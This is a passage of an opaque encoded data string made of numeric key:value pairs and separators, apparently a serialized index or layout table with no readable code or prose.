15:281|16:282|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:1570;9|9:171|10:1571;9|9:169|10:1572;p;1|1:113|5:84|3:1573|15:21|16:284|4:155|17:24|2'
- ..'6:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:162|10:286;9|9:162|10:288;9|9:158|10:290;9|9:158|10:291;9|9:160|10:294;9|9:162|10:285;9|9:160|10:295;p;1|1:113|5:19|3:1574|15:297|16:298|4:299|27:25|17:157|26:25|18:25|5:19|5:19;n;11|24:25;9|9:217|10:300;9|9:217|10:301;9|9:217|10:302;9|9:308|10:309;4|9:303|10:304;9|9:217|10:305;9|9:217|10:1418;9|9:306|10:307;p;1|1:113|5:32|3:1575|15:21|16:311|4:312|27:25|18:25|5:32|5:32;n;11|24:25;9|9:306|10:313;9|9:217|10:314;p;1|5:19|3:1576|15:115|16:316|4:234|17:24|18:24|5:19|5:19;n;9|9:124|10:317;9|9:260|10:1554;9|9:904|10:1577;p;1|1:113|5:84|3:1578|15:207|16:322|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1429;p;1|1:113|5:19|3:1579|15:325|16:326|4:196|31:7|17:24|18:24|5:19|5:19;n;11|22:327|24:157;p;1|1:113|5:19|3:1580|15:137|16:329|4:175|27:25|17:25|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|5:19|3:1581|15:242|16:331|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:332;p;1|1:113|5:19|3:1582|15:325|16:334|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;4|9:350|10:1441;9|9:119|10:1440;9|9:119|10:336;9|9:119|10:337;p;1|1:113|5:32|3:1583|15:21|16:339|4:312|27:25|18:25|5:32|5:32;n;11|24:25;4|9:340|10:341;9|9:306|10:313;9|9:904|10:1584;p;1|1:113|5:84|3:1585|15:207|16:343|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;4|9:340|10:1448;9|9:345|10:346;p;1|5:19|3:1586|15:21|16:348|4:349|31:7|5:19|5:19;1|1:113|5:84|3:1587|15:207|16:356|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1588;p;1|1:113|5:19|3:1589|15:297|16:358|4:299|27:25|17:157|21:25|18:25|5:19|5:19;n;11|24:25;9|9:904|10:1590;9|9:904|10:1591;p;1|1:113|5:9|3:1592|15:281|16:360|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:185|10:363;p;1|1:113|5:19|3:1593|16:365|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;4|9:350|10:1594;9|9:252|10:366;9|9:119|10:1466;9|9:119|10:367;9|9:119|10:368;p;1|1:113|5:84|3'
- ..':1595|15:370|16:371|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;4|9:340|10:374;9|9:372|10:373;9|9:252|10:375;p;1|5:19|3:1596|15:21|16:377|4:349|31:7|5:19|5:19;1|1:113|5:380|30:187|14:381|3:1597|15:325|16:383|4:384|31:7|18:24|5:380|5:380;n;11|22:385|24:157;p;1|1:113|5:32|3:1598|15:325|16:387|4:388|31:7|17:24|18:24|5:32|5:32;n;11|22:389|24:157;p;p;p;p;1|2:2|3:1599|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;2;n;1|2:2|5:131|14:395|3:1600|15:397|4:398|5:131|5:131;n;4|9:141|10:399;p;1|2:2|5:131|14:395|3:1601|15:401|4:398|5:131|5:131;n;4|9:141|10:402;p;1|1:403|2:2|5:404|3:1602|15:406|4:407|18:24|5:404|5:404;n;14|1:408;n;7|1:409;n;7|1:410;p;8|1:411;7|1:412;p;p;1|2:2|5:131|14:395|3:1603|15:397|4:414|5:131|5:131;n;4|9:141|10:415;p;1|2:2|5:131|14:395|3:1604|15:401|4:398|5:131|5:131;n;4|9:141|10:417;p;1|2:2|5:131|14:395|3:1605|15:397|4:419|18:24|5:131|5:131;7|1:420;p;2|1:765;n;2|1:16;n;2|1:17;n;1|1:18|5:19|14:2|3:1606|15:21|16:22|4:23|17:24|18:25|5:19|5:19;n;5|3:26|19:27;6|20:27;7;8|1:28;9|9:10|10:1607;9|9:10|10:29;9|9:10|10:1608;9|9:10|10:1511;9|9:10|10:1512;p;10|5:32|3:1609|15:21|16:34|4:35|17:25|18:24|5:32|5:32;1|1:36|5:37|3:1610|15:21|16:39|4:40|17:24|21:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;7;12|1:45|25:46;12|1:45|25:46;12|1:45|25:47;12|1:45|25:48;12|1:45|25:49;12|1:45|25:50;12|1:45|25:51;12|1:45|25:52;12|1:45|25:53;12|1:45|25:54;1|1:55|5:37|3:1611|15:21|16:57|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:58;12|1:45|25:59;12|1:45|25:60;12|1:45|25:61;12|1:45|25:62;12|1:45|25:63;12|1:45|25:64;12|1:45|25:65;12|1:45|25:66;12|1:45|25:67;12|1:45|25:68;12|1:45|25:67;12|1:45|25:69;1|1:70|5:37|3:1612|15:21|16:72|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;1|1:73|5:37|3:1613|15:21|16:75|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:1518;p;12|1:45|25:76;12|1:45|25:77;12|1:45|25:78;12|1:45|25:79;12|1:45|25:80;'
- ..'12|1:45|25:81;12|1:45|25:82;12|1:45|25:81;1|1:83|5:84|3:1614|15:21|16:86|4:87|17:24|5:84|5:84;n;7;9|9:10|10:88;p;12|1:45|25:89;12|1:45|25:90;12|1:45|25:91;12|1:45|25:92;12|1:45|25:93;12|1:45|25:94;12|1:45|25:95;12|1:45|25:96;12|1:45|25:97;12|1:45|25:98;12|1:45|25:99;12|1:45|25:100;12|1:45|25:101;12|1:45|25:102;12|1:45|25:103;12|1:45|25:104;12|1:45|25:105;12|1:45|25:106;12|1:45|25:107;12|1:45|25:108;12|1:45|25:109;p;7;8|1:110;8|1:111;2|1:112;n;1|1:113|5:32|3:1615|15:115|16:116|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:1314;9|9:119|10:120;p;1|1:113|5:84|3:1616|15:21|16:122|4:123|27:25|17:25|18:25|5:84|5:84;n;11|22:118|24:25;9|9:158|10:1617;9|9:237|10:796;9|9:124|10:240;p;1|1:113|5:32|3:1618|15:21|16:127|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:130|29:24;p;1|1:113|5:131|3:1619|15:133|16:134|4:135|17:25|18:25|5:131|5:131;n;11;9|9:804|10:1547;9|9:270|10:1620;9|9:223|10:88;p;1|1:113|5:19|3:1621|15:137|16:138|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:143;9|9:119|10:1527;9|9:141|10:142;p;1|1:113|5:19|3:1622|15:137|16:145|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:32|3:1623|15:115|16:148|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:1624;9|9:119|10:1522;p;1|1:113|5:19|3:1625|15:150|16:151|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|5:84|3:1626|15:153|16:154|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:158|10:1341;9|9:162|10:163;9|9:160|10:161;p;1|1:113|5:9|3:1627|15:150|16:167|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:169|10:1628;p;1|1:113|5:19|3:1629|15:150|16:174|4:175|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:178|10:1630;9|9:391|10:1538;9|9:176|10:177;p;1|1:113|5:9|3:1631|15:150|16:181|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:176|10:186;p;1|1:113|5:131|30:187|3:1632|15:133|16:189|4:190|17:25|18:25|5:1'
- ..'31|5:131;n;11|22:191;p;1|1:113|5:131|3:1633|16:195|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:199;p;1|1:113|5:32|3:1634|15:21|16:204|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:205|29:157;p;1|1:113|5:84|3:1635|15:207|16:208|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1636;p;1|5:19|3:1637|15:115|16:212|4:213|17:24|18:214|5:19|5:19;n;9|9:260|10:1545;9|9:217|10:218;p;1|1:113|5:131|3:1638|15:133|16:220|4:135|17:25|18:25|5:131|5:131;n;11;9|9:804|10:1547;9|9:223|10:224;9|9:221|10:222;p;1|1:113|5:131|30:187|3:1639|15:133|16:226|4:190|17:25|18:25|5:131|5:131;n;11|22:191;p;1|1:113|5:84|3:1640|15:207|16:229|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:258|10:1641;p;1|1:113|5:131|3:1642|16:231|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:1381;9|9:158|10:1643;p;1|5:19|3:1644|15:115|16:233|4:234|17:24|18:24|5:19|5:19;n;9|9:124|10:317;9|9:217|10:1555;p;1|1:113|5:19|3:1645|15:21|16:236|4:123|27:25|17:25|18:25|5:19|5:19;n;11|22:118|24:25;9|9:124|10:125;p;1|1:113|5:19|3:1646|15:242|16:243|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:1647;9|9:141|10:1558;9|9:119|10:1648;p;1|1:113|5:84|3:1649|15:115|16:246|4:247|27:25|17:157|18:25|5:84|5:84;n;11|24:25;9|9:256|10:1650;9|9:124|10:248;4|9:258|10:259;9|9:260|10:1561;p;1|1:113|5:19|3:1651|15:137|16:250|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|3:1652|15:115|16:255|4:247|27:25|17:157|18:25;n;11|24:25;9|9:124|10:248;4|9:258|10:259;9|9:260|10:261;p;1|5:84|3:1653|15:21|16:263|4:264|31:7|17:24|32:25|18:25|5:84|5:84;n;9|9:265|10:896;9|9:265|10:266;9|9:265|10:1654;9|9:270|10:271;9|9:221|10:1655;9|9:10|10:267;9|9:268|10:1656;9|9:268|10:1657;p;1|5:32|3:1658|15:153|16:273|4:274|31:7|18:24|5:32|5:32;1|5:19|3:1659|15:115|16:278|4:213|17:24|18:214|5:19|5:19;1|1:113|5:9|3:1660|15:281|16:282|4:168'
- ..'|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:1570;9|9:171|10:1571;9|9:169|10:1572;p;1|1:113|5:84|3:1661|15:21|16:284|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:158|10:289;9|9:158|10:1662;9|9:162|10:285;9|9:158|10:293;9|9:160|10:1413;9|9:160|10:294;9|9:158|10:290;p;1|1:113|5:19|3:1663|15:297|16:298|4:299|27:25|17:157|26:25|18:25|5:19|5:19;n;11|24:25;9|9:217|10:300;9|9:217|10:1664;9|9:217|10:305;p;1|1:113|5:32|3:1665|15:21|16:311|4:312|27:25|18:25|5:32|5:32;n;11|24:25;4|9:340|10:341;9|9:306|10:313;9|9:217|10:314;p;1|5:19|3:1666|15:115|16:316|4:234|17:24|18:24|5:19|5:19;n;9|9:124|10:317;9|9:124|10:320;p;1|1:113|5:84|3:1667|15:207|16:322|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1429;p;1|1:113|5:19|3:1668|15:325|16:326|4:196|31:7|17:24|18:24|5:19|5:19;n;11|22:327|24:157;9|9:178|10:1669;9|9:391|10:1432;p;1|1:113|5:19|3:1670|15:137|16:329|4:175|27:25|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:176|10:1671;9|9:178|10:1538;9|9:391|10:179;p;1|1:113|5:19|3:1672|15:242|16:331|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:19|3:1673|15:325|16:334|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;p;1|1:113|5:32|3:1674|15:21|16:339|4:312|27:25|18:25|5:32|5:32;n;11|24:25;p;1|1:113|5:84|3:1675|15:207|16:343|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;p;1|5:19|3:1676|15:21|16:348|4:349|31:7|5:19|5:19;n;4|9:350|10:351;9|9:158|10:352;4|9:353|10:354;p;1|1:113|5:84|3:1677|15:207|16:356|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1588;p;1|1:113|5:19|3:1678|15:297|16:358|4:299|27:25|17:157|21:25|18:25|5:19|5:19;n;11|24:25;9|9:904|10:1679;9|9:904|10:1680;4|9:303|10:304;p;1|1:113|5:9|3:1681|15:281|16:360|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:19|3:1682|16:365|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;4|9:350|10:1594;9|9:252|10:366;9|9:119|10:1466;p;1|1:'
- ..'113|5:84|3:1683|15:370|16:371|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;p;1|5:19|3:1684|15:21|16:377|4:349|31:7|5:19|5:19;n;4|9:350|10:1685;9|9:162|10:378;p;1|1:113|5:380|30:187|14:381|3:1686|15:325|16:383|4:384|31:7|18:24|5:380|5:380;n;11|22:385|24:157;9|9:178|10:1476;9|9:391|10:1476;p;1|1:113|5:32|3:1687|15:325|16:387|4:388|31:7|17:24|18:24|5:32|5:32;n;11|22:389|24:157;9|9:391|10:392;p;p;p;p;1|2:2|3:1688|15:996|4:15;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:468|10:1689;4|9:428|10:1690;p;1|2:2|3:1691|4:15;n;4|9:428|10:1692;p;1|2:2|3:1693|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|2:2|3:1694|15:153|4:427;n;4|9:468|10:1695;4|9:428|10:429;p;1|1:421|2:2|5:19|3:1696|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1697|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1698|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1699|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1700|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1701|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1702|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1703|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1704|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1705|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1706|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1707|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1708|15:325|4:423|17:24|'
- ..'18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1709|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1710|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1711|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1712|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1713|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1714|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1715|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1716|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1717|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1718|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1719|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|3:1720|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:460|14:461|3:1721|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1722|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1723|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1724|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1725|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1726|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1727|15:325|4:423|17:24|18:24'
- ..'|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1728|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1729|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1730|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1731|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1732|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1733|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1734|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1735|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1736|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1737|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1738|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1739|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1740|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1741|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1742|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1743|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1744|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1745|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1746|15:325|4:423|17:24|18:24|5:19|5:'
- ..'19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1747|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1748|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1749|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1750|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1751|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1752|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1753|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1754|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1755|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1756|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1757|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1758|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1759|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1760|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1761|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1762|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1763|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1764|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1765|1'
- ..'5:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1766|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1767|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1768|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|3:1769|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1770|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1771|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1772|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1773|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1774|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1775|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1776|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1777|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1778|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1779|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:1780|2:2|3:1781|15:1782|4:1783;1|2:2|5:1784|3:1785|15:153|4:389|17:25|18:24|5:1784|5:1784;n;11|24:25;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:1787|15:1218|4:1788|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;9|9:1789|10:1790;p;1|2:2|5:1784|3:1791|15:1218|4:1788|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;7|1:450;9|9:1789|10:1792;p;1|33:1793|3:1794|4:1795|27:25|17:2'
- ..'5|32:25|21:25|26:25|18:25;n;17|1:1796|9:1797|10:1798;17|1:1796|9:1797|10:1799;9|9:1800|10:1801;p;1|2:2|5:1784|3:1802|15:21|4:1803|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:1804|15:1805|4:1806|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:1807|15:1805|4:1806|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:1808|15:1809|4:1810|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;13|28:1811|29:214;p;1|2:2|5:1784|3:1812|15:1813|4:1810|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;13|28:1814|29:214;9|9:1800|10:1815;p;1|1:421|2:2|5:19|3:1816|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1817|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1818|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1819|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1820|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1821|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1822|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1823|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:18